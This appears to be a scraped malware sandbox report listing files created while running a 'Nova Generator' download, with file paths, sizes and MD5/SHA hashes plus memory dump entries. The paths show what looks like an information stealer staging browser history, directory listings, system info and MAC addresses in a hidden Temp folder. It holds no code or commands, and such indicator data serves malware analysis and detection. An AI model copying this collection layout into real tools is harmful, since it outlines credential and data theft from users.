C:\Users\Admin\AppData\Local\Temp\     \Common Files\Documents\Opened.docx
Filesize
11KB

MD5
bfbc1a403197ac8cfc95638c2da2cf0e

SHA1
634658f4dd9747e87fa540f5ba47e218acfc8af2

SHA256
272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6

SHA512
b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Documents\ProtectClose.doc
Filesize
1.6MB

MD5
4c32a2463369c1404dfa8c78bf3e0090

SHA1
e8e2f58c7438de25d6834bdef3a0ee0baad8b696

SHA256
682e35efa73202b9b1fde75ba5d078067704d7a11566063b004432b6370b31ef

SHA512
c53ebbdd8b54d74dc2c68a98df53d72becc127f599af1f0c54d438a172388bd07ce779a01378deb09c61d7269f2432eaf80dc2d11d7730ec15abf77640e7bff8

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Documents\Recently.docx
Filesize
11KB

MD5
3b068f508d40eb8258ff0b0592ca1f9c

SHA1
59ac025c3256e9c6c86165082974fe791ff9833a

SHA256
07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7

SHA512
e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Documents\These.docx
Filesize
11KB

MD5
87cbab2a743fb7e0625cc332c9aac537

SHA1
50f858caa7f4ac3a93cf141a5d15b4edeb447ee7

SHA256
57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023

SHA512
6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Downloads\DismountExport.doc
Filesize
691KB

MD5
df548c50233087293083987eb9140151

SHA1
e31460aa4534cce5429877b8bde964ab0a4e26a6

SHA256
7705412a73fbfcd25e9f22db77ee968ad2794e237838fe8ace88ca89e6d6757d

SHA512
c7ad04c983996ffd7e5b33caf2244a03afdfc0f7e587ca3b57c047b981120083f16c4366263f175c8e0edb624823e9c8eb015aa8945eccf4e8541bb4175a152a

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Music\RestartBackup.tmp
Filesize
192KB

MD5
b17ae967d82dd97a48dc84a7607d6dba

SHA1
dfb2b9660bbf781e47b09c03ecc0414192c3ad93

SHA256
44d799af329257168e2a989b6bfac93c6caa4a1baf473a449dba0fa9a8386af5

SHA512
043f4e56ef7b86cdc9156afc76d32e44139ace77ee59f3a3e7a84bfe0a2b3db17a2a564f55644058e7525e4a8b2bba77eaba995762a7515987b8e4b763b4e54c

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Pictures\EnterBlock.png
Filesize
430KB

MD5
d0120a2462929349d3b161777a86b87f

SHA1
225cb390b7b1e823bd46ed9a489cce06b0910d98

SHA256
dfc691187c0339b03c3c687c78d1f07a0c201f80ac9209a79f970e6dd7067510

SHA512
2d246d61d608fe0e88ef74a397bd2a1b50327ee9e8bff7f7c0f527adc8e302b0fe040ad8ced195fbe715c68898e05fee6dcde5304c705e9f8ceed2e585144b95

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Pictures\EnterMove.jpeg
Filesize
245KB

MD5
cfb1cd9189e939927a6668e1faa2976c

SHA1
84a0188458b055b84e3b2ce8fdb279885045c518

SHA256
1d8066e1c4ef8622de433b1417767a869bc1b4b3e0c64885e5f5db3539327a0f

SHA512
c2197bb72cc71d8c5f81d5ab1e503d848ba1ed03ab87da8caa576026ddb1664417de2291f81f1b4ac320920b052ec38acc9545513afdcbf7fb07f02d841e48de

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Pictures\My Wallpaper.jpg
Filesize
24KB

MD5
a51464e41d75b2aa2b00ca31ea2ce7eb

SHA1
5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

SHA256
16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

SHA512
b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Pictures\OutBackup.raw
Filesize
296KB

MD5
24b7de3a8f84cf12ffda66a6bc7c3a98

SHA1
e0fefc8ec9537480ea5d690cf926cd51fe24a5f3

SHA256
1bda67596002b5f50f35fdbf2558a4951477c423738998d5fd5b7ce87c3476bb

SHA512
aafb811151edd64af4e90482d046a26f0d77cff88db392f82f93bcf1dd64c69a333b098f8031530edd178a6952e95ebb786fdaf3b9a78d0f3a225aeb285777a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Pictures\PushSearch.jpg
Filesize
225KB

MD5
daf00ddf445c3f42600b9b0d8b6a2e51

SHA1
53632f7bff72f50130a88b2855e60bdd7408d85f

SHA256
1df58fca07ed97b12f737568dd738635724cfb5a2321a2f7459f9810b45c38bb

SHA512
868755eedb30bbdcf6ccfad8f7fb5d243119543b47b8777d0967405184509b1350107139eb08ffd80835e7b9398b010d839fdb9d9ea3a9accb3cfaac9faa935e

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Pictures\SetLimit.png
Filesize
603KB

MD5
923e076b6286efdd27a724bfc2443e71

SHA1
affd0795403c23f701b6242a1c4dbe56c4ea7e58

SHA256
54a3dfae1d182f50c955d8f4d4d9a2f771998a8e7bd80a41b438ecc19835ce1e

SHA512
f278305c63fd2cdec93f2805d1d28deb2e49f91036566ac27db47d7e9c7e216db617312a28ba2a99658aee542eb0d4cd2ddeede726fd2e135270dcd86afc1d3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\     \Common Files\Pictures\UnprotectConvert.png
Filesize
215KB

MD5
dece19db156f1ab63d105c552194682e

SHA1
2cd2eddb6469442d51ac73ed96fb178c2520501a

SHA256
b57e7c915b0dd5bf2282884b9edb35fc1375d2810d7550112d84fa725d6b88a0

SHA512
9fad677593552602ecccfdb4affa5fe401e01c33593752ee8430ab33219d370532684cd5bfea25f26e9cb021126b6929e55f6090d8d7e474cca088e8d7b454ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\Credentials\Chrome\Chrome History.txt
Filesize
1KB

MD5
b0bdae2598bf308bb6158892a5a60c32

SHA1
8c65b39ad55d99d87db581b103a887b7f1bad551

SHA256
ca820b3c5d15ca9f0779eccac813ce7fbfe709a99423ba5dcdf100d2f90c0883

SHA512
7be0a817f89bd30f10b9badafad47069c514e16b4429efe7513ffab93dbf9cecdd81f43545dcac92fdc353f84fd2d7e7c73af669889329a57de4dca4a1799f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\Directories\Desktop.txt
Filesize
529B

MD5
39e216c6f74d8c8306a0afe54a619512

SHA1
d0611a1b267c21660e4b718ed2ef5fe7960abd60

SHA256
c412bebb4f6dc014d5716a235a98a3224903a3c6b2377f7d81bac0faf2e77532

SHA512
42a2819a3e80c8dae826a558b81d9d5611e801511914434398024687bff31beccf21a14e341f0f94123ce8219b89404c28fd17acb8d263cc6887cb2639a0c801

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\Directories\Documents.txt
Filesize
570B

MD5
a308cf09c08c5f6e1919e27aa2eda582

SHA1
ea4603a5a0c5154726faa37f1b88e17b577bf6d8

SHA256
8b551fb310a9020901950bcd9193ca15b5aca2bb1a3b8966d91b8703f80922d7

SHA512
860e728694b2cbf854550d5832ff36cffc69fa206b44c1347e74a62e015cf3734287406f8a07bd30bc0c245959077562cf039b5c8566a14208b6c0719c5f97dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\Directories\Downloads.txt
Filesize
1006B

MD5
ecc30cb2c1510637dbd648b3938be004

SHA1
2c1becc7524975d29ff657685b1a9104da1c4ee3

SHA256
d56aef40b2557ae7a43e095f8bd57028323dc8fdb15ca0ccff2ccd689077a8b3

SHA512
b710f23e484c9345c22cac9d1ba6de72bcf7dbeb715d317c28e0bb831dde47be7f621008f66b6324f80b6ddc615ed509cbbe3c3c1370612fd1cac1bec9ec8c19

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\Directories\Music.txt
Filesize
775B

MD5
3b705bbd9884a85096dd481d021bb3a3

SHA1
36daa6261a1a8946bb9d57087fa3f4fa14d70b5b

SHA256
3ae162e93a51b0b9d5dd6dda932b9e89766a8fd3f7f34a811e75260362e9f738

SHA512
91054017ff9cee5a3d23e117e39e92ed2703133de115d67deec89742d490d75941b23cb8400e3e72d44f44cbce5630ca6182c36821a0b40fad7cf7a5b1158a5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\Directories\Pictures.txt
Filesize
782B

MD5
59e26798fa285bbbf69bc98b19024a1b

SHA1
b604194d5c6ecc288928ffdc7f1d40030c58c0d6

SHA256
c847170ecbee579abc2e9a47f7965bc2bf8f2e225db3c1f50bc362be654cd3aa

SHA512
904fb0612777c59fdc2387dffc9cc3b597fd51a638a95b79a5013e2dfa4c4ff939758df2685cd53a883103c67c9d843b283961e058fb3bf58d61f1366724a9ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\Directories\Videos.txt
Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\System\MAC Addresses.txt
Filesize
232B

MD5
b5e98b20b3ed1a68dbcb6303da6834b4

SHA1
7f2ab8fd6d97ce820f5781ba59272c0a4189a36c

SHA256
02d5ae13409b26694c09512ac203b33badaf712198c987b87fab6171d634ee80

SHA512
ca02a63f62dc57244b8b46c5c15f0ee64806cf50e8527601885c744606486f68223fb0d57179d6f0e13eba67eab984db05f856cad25652e3fa4063b05bd133d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍   ‏\System\System Info.txt
Filesize
2KB

MD5
5f91737ccd84815ad28b0226b00b4599

SHA1
66ec058fdbb4425111b4a1d4c9667768f38ca4a3

SHA256
d9e542b4806650ba8482385dfb85d98954d7c70978afb6e59ab390fcfeec1c06

SHA512
639dd340ea04b4164e1f21ce3c7e6c75eef6fbafde0cc706fdee09ef69e2ee119886531d63252d9258fad166f6a49713a4c9797f4a9bdfa85da66b59a3cbc44e

Download Submit
C:\Users\Admin\Downloads\Nova_Gen.zip
Filesize
10.8MB

MD5
f9db3cbd9eb59912e3aa7f3d8bbef40c

SHA1
b0f57bc08e58205757286ddc33b5605a21650568

SHA256
1dbb77d188ded267b1653db8e9bfaf264ea9962269bca6e14d6c264b43575b58

SHA512
09a56135f60105e22d2813f1d86aa87aff0254cf870de978d9c78e9ef4c4a5996852ea2cfdd625e0a07a7520290ca271668266a7166e94411f1676da2155a512

Download Submit
C:\Users\Admin\Downloads\Nova_Gen.zip:Zone.Identifier
Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
Filesize
8.5MB

MD5
f4e7c9f3ccbfa8b69710d9ae6ca205cc

SHA1
dfb2521d16f11c9a46c63f57af540865d8bc7e14

SHA256
e71d605b48b66bc4b46eea37119e0a1ea7df6ab98104fb679ae1a42711a6740b

SHA512
131474b93dd6f15b09595239194278d5ef0eb897480d29fb095283e242ca18766808ee39384e29031763aa61d3fbeb7b51ffba3c4c892fecc997e368b8458101

Download Submit
C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\NovaGen.exe
Filesize
11.0MB

MD5
45b02f065f3be51613478c0ab91abe88

SHA1
c82d305bb892d8fc062735a2d4003bfd6619dd19

SHA256
bd48c14d00cdb90f6b8b9c0cbe0244337677e8616d809a12b2316c03851ed523

SHA512
59eb273ff3864d5d1ea8d3abda01973bc8422c07794626301157bfc5a931547c81637e68c143e775b4cc793112fa770f6bd3a8dfd13ae60b0dfdce703ae315c8

Download Submit
\??\pipe\crashpad_4584_SVTWFAHPAIOJEUME
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2288-2117-0x000002447A000000-0x000002447AAC2000-memory.dmp

Filesize
10.8MB

Download
memory/3176-2516-0x000001D2148E0000-0x000001D2153A2000-memory.dmp

Filesize
10.8MB

Download
memory/3744-1755-0x0000022D92E00000-0x0000022D92E08000-memory.dmp

Filesize
32KB

Download
memory/3848-1124-0x000001425B0D0000-0x000001425B0F2000-memory.dmp

Filesize
136KB

Download
memory/5040-2517-0x000001F881C90000-0x000001F881C98000-memory.dmp

Filesize
32KB

Download
memory/5500-2118-0x000002182E720000-0x000002182E728000-memory.dmp

Filesize
32KB

Download
memory/5728-1223-0x000001DC79D40000-0x000001DC79D48000-memory.dmp

Filesize
32KB

Download
memory/5952-1754-0x00000175A9330000-0x00000175A9DF2000-memory.dmp

Filesize
10.8MB

Download